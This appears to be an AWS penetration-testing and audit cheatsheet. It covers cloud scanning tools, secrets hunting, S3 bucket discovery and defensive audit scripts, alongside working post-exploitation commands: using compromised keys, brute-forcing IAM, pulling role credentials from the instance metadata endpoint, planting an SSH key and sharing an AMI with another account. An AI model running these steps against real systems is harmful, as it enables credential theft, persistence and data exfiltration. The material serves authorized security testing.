Automated Scanning Tools

These are tools that attackers or defenders can run to get a sense of all the assets in an environment.

Create audit user to use for running tools

export AUDIT_IAM_USER="usr-security-audit"

aws iam create-user --user-name "${AUDIT_IAM_USER}"
aws iam attach-user-policy --user-name "${AUDIT_IAM_USER}" --policy-arn arn:aws:iam::aws:policy/ReadOnlyAccess
aws iam attach-user-policy --user-name "${AUDIT_IAM_USER}" --policy-arn arn:aws:iam::aws:policy/SecurityAudit

aws iam create-access-key --user-name "${AUDIT_IAM_USER}"

Be sure to create a profile in your ~/.aws/config and ~/.aws/credentials for this user to make copying and pasting the steps for the tools below as easy as possible!
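
For example (the profile name, region, and key values below are placeholders; use the access key returned by create-access-key above), the entries might look like this:

In ~/.aws/credentials:

[security-audit]
aws_access_key_id = AKIAIOSFODNN7EXAMPLE
aws_secret_access_key = wJalrXUtnFEMI/K7MDENG/bPxRfiCYEXAMPLEKEY

In ~/.aws/config:

[profile security-audit]
region = us-west-2
output = json

Then export AWS_PROFILE=security-audit to use it with the commands below.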


CloudMapper

This will give you a visual perspective on the target environment and the relationships that exist between the various assets.

Install OS dependencies:

  • macOS:

    brew install autoconf automake libtool jq awscli pyenv pipenv
    
  • Debian-based system:

    sudo apt-get install -y autoconf \
      automake libtool python3.7-dev python3-tk jq awscli build-essential
    
  • CentOS, RHEL, etc.:

    sudo yum install -y autoconf automake libtool python3-devel.x86_64 \
      python3-tkinter python-pip jq awscli
    

Installation and configuration:

Clone the repo:

git clone git@github.com:duo-labs/cloudmapper.git

Set up python and install dependencies:

cd cloudmapper
pipenv --python 3.8.3 && pipenv shell
pip install --upgrade pip
# Remove the explicit versions because this project
# uses nightmare dependencies and python wants to ruin your life
# (BSD/macOS sed syntax; on GNU/Linux, drop the '' after -i)
sed -i '' 's/==.*//' requirements.txt
pipenv install --skip-lock
# Use demo config as a base for your config
cp config.json.demo config.json

Set your config to point to the target account IDs:

{
  "accounts": [
    { "id": "123456789012", "name": "dev", "default": true },
    { "id": "123456789013", "name": "prod", "default": false }
  ],
  "cidrs": {}
}

Note: Do not forget to include the empty cidrs key-value pair, or the tool won’t work and won’t tell you why!

Collect data from the environment

If you don’t use profiles, you’ll need to configure your credentials. Here’s a page to help you with that: /aws-cheatsheet/#useenvvars.

This particular example will get you information from the dev environment you’ve configured:

python cloudmapper.py collect --profile ${AWS_PROFILE} --account dev

Generate data for the map

python cloudmapper.py prepare --account dev

Generate a report

python cloudmapper.py report --account dev

Run the webserver to interface with the report

python cloudmapper.py webserver

Access the report at http://127.0.0.1:8000/account-data/report.html

You can also view the graphical representation of the relationships between resources at http://127.0.0.1:8000


ScoutSuite

ScoutSuite (https://github.com/nccgroup/ScoutSuite) will generate an HTML report outlining various issues that exist in the configuration of a given account.

Installation and configuration:

git clone git@github.com:nccgroup/ScoutSuite.git
cd ScoutSuite
pipenv --python 3.8.3 && pipenv shell
pipenv install --skip-lock

Run it:

python scout.py aws --profile "${AWS_PROFILE}"

Resource: https://kalilinuxtutorials.com/scout-suite-multi-cloud-security-auditing-tool/

PMapper

Provides an interface for understanding IAM relationships.

Install OS dependencies:

macOS:

brew install graphviz

Installation and configuration:

git clone git@github.com:nccgroup/PMapper.git
cd PMapper
pipenv --python 3.8.3 && pipenv shell
pipenv install --skip-lock

Run it:

Create a graph of accesses:

python pmapper.py --profile ${AWS_PROFILE} graph create

Analyze the results:

python pmapper.py analysis

Query the results:

python pmapper.py --profile ${AWS_PROFILE} query "who can do s3:GetObject with *"

Visualize the results:

# This account ID should correspond to the environment that
# you've been interfacing with via ${AWS_PROFILE}
AWS_ACCOUNT_ID=123456789012
python pmapper.py --account ${AWS_ACCOUNT_ID} visualize

Query accesses. Examples of what you can do:

"can <Principal> do <Action> [with <Resource>]"
"who can do <Action> [with <Resource>]"
"preset <preset_query_name> <preset_query_args>"

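The preset queries are handy for common hunts. For example, to look for privilege-escalation paths (a sketch; preset name per the PMapper docs):

# Check all principals for privilege escalation potential
python pmapper.py --profile ${AWS_PROFILE} query "preset privesc *"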


Prowler

Install OS dependencies:

  • macOS:

    brew install jq
    
  • Linux:

    sudo apt-get install -y jq
    

Installation and configuration:

git clone git@github.com:toniblyx/prowler.git
cd prowler
pipenv install --skip-lock
# Grab additional custom policy for extras and add to our audit user
wget https://raw.githubusercontent.com/toniblyx/prowler/master/iam/prowler-additions-policy.json
aws iam put-user-policy --user-name ${AUDIT_IAM_USER} --policy-name prowler-additions-policy --policy-document file://prowler-additions-policy.json

Run it:

# Output html report format
./prowler -r us-west-2 -M html -p ${AWS_PROFILE}


SkyArk

Install OS dependencies:

  • macOS:

    brew update && brew install azure-cli
    
  • Linux:

    curl -sL https://aka.ms/InstallAzureCLIDeb | sudo bash
    

Installation and configuration:

git clone git@github.com:cyberark/SkyArk.git
cd SkyArk

Run it:

pwsh-preview
Import-Module .\SkyArk.ps1 -force
Start-AWStealth

Input your AWS creds when prompted.

Resource: https://github.com/cyberark/SkyArk


Secrets Hunting

If you’re hunting for secrets in git repos, you can try some of these commands:

Search for aws keys in bash scripts

find / -name '*.sh' -exec grep -HE "([^A-Z0-9]|^)AKIA[A-Z0-9]{12,}" {} \;

Resource: https://twitter.com/omespino/status/1242977678329819141?s=20
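
Search git history for AWS keys

Secrets are often deleted from the working tree but linger in old commits, so it’s worth grepping the full history as well (a minimal sketch; the repo path is a placeholder):

git -C /path/to/repo log -p --all | grep -E "([^A-Z0-9]|^)AKIA[A-Z0-9]{16}"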

Search for access keys with grep

Access key:

grep -RP '(?<![A-Z0-9])[A-Z0-9]{20}(?![A-Z0-9])' * 2>/dev/null

Secret access key:

grep -RP '(?<![A-Za-z0-9/+=])[A-Za-z0-9/+=]{40}(?![A-Za-z0-9/+=])' * 2>/dev/null

Resource: https://gist.github.com/hsuh/88360eeadb0e8f7136c37fd46a62ee10


S3

Hunting

You can reach S3 buckets over HTTP(S) regardless of whether access is permitted. The URL formats are:

https://<bucketname>.s3.amazonaws.com
https://s3.amazonaws.com/<bucketname>

A couple of things worth keeping in mind for creating tooling around hunting for buckets (a quick validation sketch follows the list):

  • Names must be >= 3 && <= 63 characters long
  • Names can contain lowercase letters, numbers and hyphens
  • Names consist of labels, which can be separated with periods. Each label must start and end with a lowercase letter or number
  • Bucket names can’t be formatted as an IP address
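
If you’re generating candidate names, a local validity check saves requests. A minimal bash sketch of the rules above (the function name is made up for illustration):

# Returns 0 if the name satisfies the S3 bucket naming rules above
is_valid_bucket_name() {
  local name="$1"
  local label_re='^[a-z0-9]([a-z0-9-]*[a-z0-9])?(\.[a-z0-9]([a-z0-9-]*[a-z0-9])?)*$'
  local ip_re='^[0-9]{1,3}\.[0-9]{1,3}\.[0-9]{1,3}\.[0-9]{1,3}$'
  [[ ${#name} -ge 3 && ${#name} -le 63 ]] || return 1   # length check
  [[ ${name} =~ $label_re ]] || return 1                # label structure
  [[ ${name} =~ $ip_re ]] && return 1                   # no IP-formatted names
  return 0
}

is_valid_bucket_name "example-com" && echo "worth probing"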

Response codes

404 - bucket doesn’t exist
403 - bucket exists but you don’t have access
200 - bucket exists and is accessible

If a bucket returns a 403, you can still do some things with the S3 API (this does cost money per 1000 requests, so be sparing when hunting for buckets on a large scale).
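
For example, with any valid AWS credentials (they don’t need to belong to the bucket’s account), these calls can confirm existence and sometimes the region; a minimal sketch, with BUCKET_NAME as a placeholder:

# A 403 error here still confirms the bucket exists; a 404 means it doesn't
aws s3api head-bucket --bucket "${BUCKET_NAME}"
# May reveal the bucket's region if the policy allows it
aws s3api get-bucket-location --bucket "${BUCKET_NAME}"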

AWS CLI

It’s also worth trying things out with the CLI. Remember to try both reading and writing (sometimes you can do one but not the other).

List files in bucket:

aws s3 ls s3://bucketname

Copy a file to a bucket:

aws s3 cp canary.txt s3://bucketname

Google Dorks

site:s3.amazonaws.com example
site:s3.amazonaws.com example.com
site:s3.amazonaws.com example-com
site:s3.amazonaws.com com.example
site:s3.amazonaws.com com-example

List the size and name of s3 buckets your credentials can access

Be sure to change the region.

#!/bin/bash
aws_profile=('default' 'otherprofile');

#loop AWS profiles
for i in "${aws_profile[@]}"; do
  echo "${i}"
  buckets=($(aws --profile "${i}" --region us-east-2 s3 ls s3:// --recursive | awk '{print $3}'))

  #loop S3 buckets
  for j in "${buckets[@]}"; do
    echo "${j}"
    aws --profile "${i}" --region us-east-2 s3 ls s3://"${j}" --recursive --human-readable --summarize | awk END'{print}'
  done

done

Run S3Scanner

git clone git@github.com:sa7mon/S3Scanner.git
cd S3Scanner
pipenv shell
pip install -r requirements.txt
python s3scanner.py buckets_to_test.txt

buckets_to_test.txt should generally look something like this:

a-bucket
b-bucket

Just to make sure it’s totally clear what exactly you should put into buckets_to_test.txt: if you were to run a curl command to test whether the first bucket was open, you would run something like this:

# if 200, then it's open
curl -s -o /dev/null -w "%{http_code}" https://s3.amazonaws.com/a-bucket
# if 200, then it's open
curl -s -o /dev/null -w "%{http_code}" -L https://a-bucket.s3.amazonaws.com

Do not name your input file buckets.txt, or this thing will go into an infinite loop!


Run S3 Objects Check

Provides white-box and black-box testing of S3 object permissions.

python s3-objects-check.py -p internal-profile -e external-profile


Create vulnerable s3 bucket

Warning: This is seriously super bad to do and you should destroy it with fire/never ever do this!!!!

# Create bucket
BUCKET_NAME=$(head /dev/urandom | tr -dc a-z0-9 | head -c 25 ; echo '')
aws s3 mb s3://${BUCKET_NAME}

# Create bucket policy that makes the bucket publicly readable/writable
cat > seriously_bad_bucket_policy.json <<- EOM
{
   "Statement": [
      {
         "Effect": "Allow",
         "Principal": "*",
         "Action": "s3:GetObject",
         "Resource": "arn:aws:s3:::${BUCKET_NAME}/*"
      },
      {
         "Effect": "Allow",
         "Principal": "*",
         "Action": [
            "s3:PutObject"
         ],
         "Resource": "arn:aws:s3:::${BUCKET_NAME}/*"
      }
   ]
}
EOM

# Add bucket policy that makes all items in the bucket public
aws s3api put-bucket-policy --bucket ${BUCKET_NAME} --policy file://seriously_bad_bucket_policy.json

# Disable the account-level public access block for all s3 buckets
# (if the block was enabled, this has to happen before the put-bucket-policy call above will succeed)
aws s3control put-public-access-block --public-access-block-configuration BlockPublicAcls=false,IgnorePublicAcls=false,BlockPublicPolicy=false,RestrictPublicBuckets=false --account-id 123456789012 | jq

# Unset creds
unset AWS_SESSION_TOKEN AWS_SECRET_ACCESS_KEY AWS_ACCESS_KEY_ID AWS_PROFILE

# Upload something.pdf to bucket
aws s3 cp something.pdf s3://${BUCKET_NAME} --no-sign-request

# Download the file anonymously over the public URL
curl https://${BUCKET_NAME}.s3.us-west-2.amazonaws.com/something.pdf -o 'stolen_something.pdf'
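
When you’re done, actually destroy it with that fire. A minimal cleanup sketch (re-set your admin credentials first; the account ID is a placeholder):

# Delete the bucket and everything in it
aws s3 rb s3://${BUCKET_NAME} --force
# Re-enable the account-level public access block
aws s3control put-public-access-block --account-id 123456789012 --public-access-block-configuration BlockPublicAcls=true,IgnorePublicAcls=true,BlockPublicPolicy=true,RestrictPublicBuckets=true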

Resource: https://searchcloudsecurity.techtarget.com/feature/Hands-on-guide-to-S3-bucket-penetration-testing

Find empty buckets

for bucket in $(aws s3api list-buckets --query "Buckets[].Name" \
  --output table | tail -n +4 | awk '{print $2}'); do
  if [ "$(aws s3 ls ${bucket} | wc -m | awk '{print $1}')" = "0" ]; then
    aws s3api get-bucket-website --bucket ${bucket} > /dev/null 2>&1
    ret=$?
    if [ ${ret} -ne 0 ]; then
      echo "${bucket}"
    fi
  fi
done

Resource: https://gist.github.com/ericpardee/aa41fa0b05603d075792c9ce8d4529a0

Upload file to public S3 bucket w/ no creds

BUCKET_NAME=blaasdfasdf
unset AWS_SESSION_TOKEN AWS_SECRET_ACCESS_KEY AWS_ACCESS_KEY_ID AWS_PROFILE
aws s3 cp something.pdf s3://${BUCKET_NAME}/ --region us-west-2 --no-sign-request

Resource: https://github.com/aws/aws-cli/issues/904


Post Exploitation

This is a good place to start if you’ve got credentials or you’ve compromised a system that’s hosted on AWS.

Configure credentials for AWS cli

If you have any existing AWS environment variables set, unset them:

unset {AWS_DEFAULT_REGION,AWS_SECRET_ACCESS_KEY,AWS_ACCESS_KEY_ID,AWS_SESSION_TOKEN}

Add the compromised keys to ~/.aws/credentials. It should look something like this:

[target_name]
aws_access_key_id=AKIAIOSFODNN7EXAMPLE
aws_secret_access_key=wJalrXUtnFEMI/K7MDENG/bPxRfiCYEXAMPLEKEY
aws_session_token=AQoDYXdzEJr...<remainder of security token>

Make sure to set the proper region as well in ~/.aws/config, which you can get using this command on the compromised instance:

curl http://169.254.169.254/latest/dynamic/instance-identity/document

An alternative with wget:

wget -O - -q http://169.254.169.254/latest/dynamic/instance-identity/document
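
To pull just the region out of that identity document (assuming jq is available):

curl -s http://169.254.169.254/latest/dynamic/instance-identity/document | jq -r .region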

The ~/.aws/config entry should look something like this:

[target_name]
region = target_region_here
output = json

Set the profile:

export AWS_PROFILE=target_name

Get UserID

aws sts get-caller-identity --output json | jq -r '.UserId'

BruteForce IAM Permissions

git clone git@github.com:andresriancho/enumerate-iam.git
cd enumerate-iam/
pipenv --python 3.8.3 && pipenv shell
pipenv install --skip-lock
cd enumerate_iam
git clone git@github.com:aws/aws-sdk-js.git
python generate_bruteforce_tests.py
rm -rf aws-sdk-js
# Run the brute force from the repo root
cd ..
python enumerate-iam.py --access-key $AWS_ACCESS_KEY_ID --secret-key $AWS_SECRET_ACCESS_KEY --session-token $AWS_SESSION_TOKEN

Resource: https://hackingthe.cloud/aws/enumeration/brute_force_iam_permissions/

Test IAM for priv esc potential

Use https://github.com/RhinoSecurityLabs/Cloud-Security-Research/blob/master/AWS/aws_escalate/aws_escalate.py

Import an SSH key

aws ec2 import-key-pair --key-name 'THE_BEST_KEY_EVER' --public-key-material file:///home/ubuntu/.ssh/not_evil_i_promise.pub

Resource: https://www.secsignal.org/en/news/how-i-hacked-a-whole-ec2-network-during-a-penetration-test/


Pacu

Set the keys

This will import the keys from the default profile in ~/.aws/credentials:

import_keys default

Set the region

This will set the region to us-east-2:

set_regions us-east-2

Verify credentials

whoami

List modules

ls

Run module

This will run a module to enumerate permissions the current account has:

run iam__enum_permissions

Find VPC flow logs that are failing to deliver

for region in $(aws ec2 describe-regions --output text | cut -f4); do
  echo "in ${region}"
  aws ec2 --region ${region} describe-flow-logs | jq '.FlowLogs[] | select(.DeliverLogsStatus == "FAILED")'
done

Create AMI without stopping instance

aws ec2 create-image --instance-id $INSTANCE_ID --name "TotallyNormalNothingToSeeHere" --description "The best AMI" --no-reboot
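
A common follow-up (a sketch; the image and account IDs are placeholders) is to share the resulting AMI with an account you control and launch it there:

aws ec2 modify-image-attribute --image-id ami-0123456789abcdef0 --launch-permission "Add=[{UserId=123456789012}]"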

Resource: https://www.secsignal.org/en/news/how-i-hacked-a-whole-ec2-network-during-a-penetration-test/


Shadow Admin POC

For this to work you’ll need credentials that will allow you to list instance profiles, create a new key pair, and run instances.

  1. Get a list of instance profiles:
     aws iam list-instance-profiles
  2. Locate a juicy role in the output.
  3. Create a new key pair:
     aws ec2 create-key-pair --key-name EvilKey
  4. Create a new instance using that profile and key:
     aws ec2 run-instances --image-id ami-1234bv45 --instance-type t1.micro --security-groups default --iam-instance-profile Name=JuicyRole --key-name EvilKey
  5. Access the new instance and grab the IAM security credentials:
     curl http://169.254.169.254/latest/meta-data/iam/security-credentials/JuicyRole
  6. Enjoy :)

Resource: https://www.youtube.com/watch?v=mK62I1BNmXs

Find Shadow Admin Accounts

# Replace {} with the target username, and provide_policy_arn with the policy ARN from the first command
aws iam list-attached-user-policies --user-name {}
aws iam get-policy-version --policy-arn provide_policy_arn --version-id $(aws iam get-policy --policy-arn provide_policy_arn --query 'Policy.DefaultVersionId' --output text)
aws iam list-user-policies --user-name {}
aws iam get-user-policy --policy-name policy_name_from_above_command --user-name {} | python -m json.tool
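
To sweep every user in the account with the calls above, a rough sketch:

for user in $(aws iam list-users --query 'Users[].UserName' --output text); do
  echo "=== ${user} ==="
  # Managed policies attached to the user
  aws iam list-attached-user-policies --user-name "${user}" --output text
  # Inline policies embedded in the user
  for policy in $(aws iam list-user-policies --user-name "${user}" --query 'PolicyNames[]' --output text); do
    aws iam get-user-policy --user-name "${user}" --policy-name "${policy}"
  done
done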

Resource: https://pentestbook.six2dez.com/enumeration/cloud/aws


Find unencrypted EBS volumes

Uses output from /aws-cheatsheet/#getactiveregions

for region in ${ACTIVE_REGIONS[@]}; do
  volumes=$(aws ec2 describe-volumes --region ${region} --filter Name=encrypted,Values=false --query 'Volumes[*].[VolumeId]' --output text 2>/dev/null)
  if [[ ! -z ${volumes} ]]; then
    echo -e "Unencrypted volumes found in ${region}:\n${volumes}"
  fi
done

Find unencrypted volumes connected to EC2 instances

volumes=$(aws ec2 describe-volumes --region eu-west-1 --filter "Name=encrypted,Values=false" "Name=status,Values=in-use" --query 'Volumes[*].[VolumeId]' --output text)

if [[ ! -z ${volumes} ]]; then
  echo -e "Unencrypted volumes found that are connected to ec2 instances:\n${volumes}"
fi


Find unencrypted EBS snapshots

AWS_ACCOUNT_ID=123456789012

for snapshot in $(aws ec2 describe-snapshots --region ${AWS_REGION} --owner-ids ${AWS_ACCOUNT_ID} --filters Name=status,Values=completed --output text --query 'Snapshots[*].SnapshotId'); do
    enc=$(aws ec2 describe-snapshots --region ${AWS_REGION} --snapshot-ids ${snapshot} --query 'Snapshots[*].Encrypted' --output text)

    if [[ ${enc} == "False" ]]; then
        echo "No encryption for ${snapshot}!!"
    else
        echo "${snapshot} is encrypted"
    fi
done

Find neglected access keys

#!/bin/bash

set -e

usernames=($(aws iam list-users --output text | cut -f 6))

for user in ${usernames[@]}; do
  echo "Reviewing access keys for ${user}:"
  keys=($(aws iam list-access-keys --user-name ${user} --output text | cut -f 2))
  for key in ${keys[@]}; do
    last_used=$(aws iam get-access-key-last-used --access-key-id ${key} | jq -r .AccessKeyLastUsed.LastUsedDate)
    # BSD/macOS date flags; on Linux use: date -d "${last_used}" +%s and date -d '90 days ago' +%s
    last_used_sec=$(date -j -f "%Y-%m-%dT%H:%M:%S+00:00" "${last_used}" +%s)
    upper_bound_sec=$(date -j -v-90d +%s)

    if [[ ${last_used_sec} -lt ${upper_bound_sec} ]]; then
      echo "${key} has not been used in over 90 days!"
    fi
  done
done



Grab Instance Profile creds, print in copy paste format

echo "export AWS_ACCESS_KEY_ID=$(curl -s 169.254.169.254/latest/meta-data/iam/security-credentials/eks_node_test_private | jq .AccessKeyId | tr -d '"')"
echo "export AWS_SECRET_ACCESS_KEY=$(curl -s 169.254.169.254/latest/meta-data/iam/security-credentials/eks_node_test_private | jq .SecretAccessKey | tr -d '"')"
echo "export AWS_SESSION_TOKEN=$(curl -s 169.254.169.254/latest/meta-data/iam/security-credentials/eks_node_test_private | jq .Token | tr -d '"')"

GuardDuty

Get GuardDuty detector id

aws guardduty list-detectors \
  --region us-east-1 --query 'DetectorIds[0]' | tr -d '"'

Get GuardDuty finding ids

aws guardduty list-findings \
  --region us-east-1 --detector-id \
    $(aws guardduty list-detectors \
    --region us-east-1 --query 'DetectorIds[0]' | tr -d '"')
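
To pull the details for those findings (a sketch that reuses the same detector lookup):

DETECTOR_ID=$(aws guardduty list-detectors --region us-east-1 --query 'DetectorIds[0]' --output text)
aws guardduty get-findings --region us-east-1 --detector-id "${DETECTOR_ID}" \
  --finding-ids $(aws guardduty list-findings --region us-east-1 \
    --detector-id "${DETECTOR_ID}" --query 'FindingIds[]' --output text)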

Resource: https://www.cloudconformity.com/knowledge-base/aws/GuardDuty/findings.html


IAM

Identify IAM users with specific access

users=$(aws iam list-users --query 'Users[*].UserName' --output text)
permission=guardduty:ListDetectors

for user in $users; do
    # List inline user policies and check for permission
    policies=$(aws iam list-user-policies --user-name $user --query 'PolicyNames' --output text)

    for policy in $policies; do
        policyDocument=$(aws iam get-user-policy --user-name $user --policy-name $policy --query 'PolicyDocument' --output json)
        if echo $policyDocument | jq -r '.Statement[] | select(.Effect == "Allow") | .Action' | grep -q $permission; then
            echo "User $user has $permission permission in policy $policy"
        fi
    done

    # List attached managed policies and check for permission
    attachedPolicies=$(aws iam list-attached-user-policies --user-name $user --query 'AttachedPolicies[*].PolicyArn' --output text)

    for policyArn in $attachedPolicies; do
        versions=$(aws iam list-policy-versions --policy-arn $policyArn --query 'Versions[*].VersionId' --output text)
        for version in $versions; do
            policyDocument=$(aws iam get-policy-version --policy-arn $policyArn --version-id $version --query 'PolicyVersion.Document' --output json)
            if echo $policyDocument | jq -r '.Statement[] | select(.Effect == "Allow") | .Action' | grep -q $permission; then
                echo "User $user has $permission permission in policy $policyArn version $version"
            fi
        done
    done
done